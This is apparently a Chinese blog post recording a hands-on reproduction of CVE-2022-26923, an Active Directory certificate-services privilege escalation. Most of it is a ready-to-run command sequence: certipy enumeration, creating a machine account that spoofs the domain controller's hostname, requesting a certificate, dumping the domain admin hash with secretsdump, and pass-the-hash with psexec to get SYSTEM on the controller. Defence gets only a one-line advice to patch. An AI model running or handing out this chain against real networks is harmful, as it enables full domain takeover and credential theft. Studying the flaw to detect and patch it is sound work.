cve-2022-26923漏洞复现+实战+踩坑记录

一、描述

cve-2022-26923域内权限提升漏洞，5月份以前的存在证书服务器的通杀域控管理员权限，危害巨大。
#域控漏洞 #域控证书漏洞

二、利用条件

一个域内普通账号

存在证书服务器

能访问域控和证书服务器那几个端口

三、利用过程（超级重码，步骤有疑问去看原文）

当前有一个域账号，攻击机为自己电脑（挂好代理可访问内网）：

1.certipy查找证书服务器主机名和ip

certipy find "XXXXX.com.cn/username:password@域控ip" -debug

2.修改攻击机hosts

C:\Windows\System32\drivers\etc\hosts

dc的ip dc的域名
ca的ip ca的域名

3.certipy利用域账号创建个机器账号（这个机器账号属性dnsHostName和域控的主机名一样，这也是漏洞点所在）：

certipy account create "XXXXX.com.cn/username:password@域控ip" -dc-ip  域控ip -user "随便起一个机器名（如:machinetestcymm）" -dns "域控的主机名（假设为DC.com.cn）" -debug

4.certipy使用该机器账号请求一个证书（漏洞成因：因为机器账号dnsHostName属性和域控一样，被误认为是域控权限）

certipy req -dc-ip 域控ip "XXXX.com.cn/机器账名$:机器账号密码@域控ip" -ca CA主机名（步骤1查到的（不带.com.cn这种后缀）） -template Machine -debug

5.certipy用证书请求域控机器账号HASH

6.secretsdump.py使用域控机器账号hash获得域管理员账户的hash

python secretsdump.py -hashes 域控机器账户hash:域控机器账户hash  "XXXX.com.cn/域控机器账号（不带.com.cn）$@域控ip"  -just-dc-user 域管理账户名（dcadministrator）

7.psexec.py进行pth，获得域控system权限：

python3 psexec.py -hashes :域管hash 域管账户名@域控ip -dc-ip 域控ip

到这里就结束了，
过程中用到的域渗透的基础技术不是本次漏洞重点，就省略了，相信熟悉域渗透的同学都能明白（比如XXXX.com.cn一看就是域的域名，域控ip如何查询），下面是针对不同技术人员的解释，东西太多csdn不支持图片导入，原文都在我的公众号里https://mp.weixin.qq.com/s/3DZPkG4Z9w8xbVKvW64Mgw
三、详情，以及某些涉及的基础域知识
四、踩坑报错排查
五、漏洞修复
请尽快更新微软发布的域控补丁包